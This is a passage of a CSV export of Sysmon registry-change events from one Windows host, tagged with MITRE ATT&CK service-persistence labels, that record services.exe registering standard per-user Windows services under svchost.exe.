service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.809166400Z"",""eventRecordID"":""935"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:15.362",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.785543400Z"",""eventRecordID"":""934"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_376ac\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:15.111",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.785217200Z"",""eventRecordID"":""933"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.814",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.783915000Z"",""eventRecordID"":""932"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 11:01:14.698",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.783593200Z"",""eventRecordID"":""931"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.523",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.777295100Z"",""eventRecordID"":""930"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:14.269",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.768855200Z"",""eventRecordID"":""929"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.228",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.766950500Z"",""eventRecordID"":""928"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:14.215",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.766623300Z"",""eventRecordID"":""927"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_376ac\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_376ac\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_376ac\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 11:01:14.198",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.761614600Z"",""eventRecordID"":""926"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:14.178",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.760774700Z"",""eventRecordID"":""925"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.148",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.759126800Z"",""eventRecordID"":""924"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 11:01:14.125",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.758770900Z"",""eventRecordID"":""923"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.098",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.754016500Z"",""eventRecordID"":""922"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 11:01:14.061",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.753703400Z"",""eventRecordID"":""921"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.979",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.751959800Z"",""eventRecordID"":""920"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 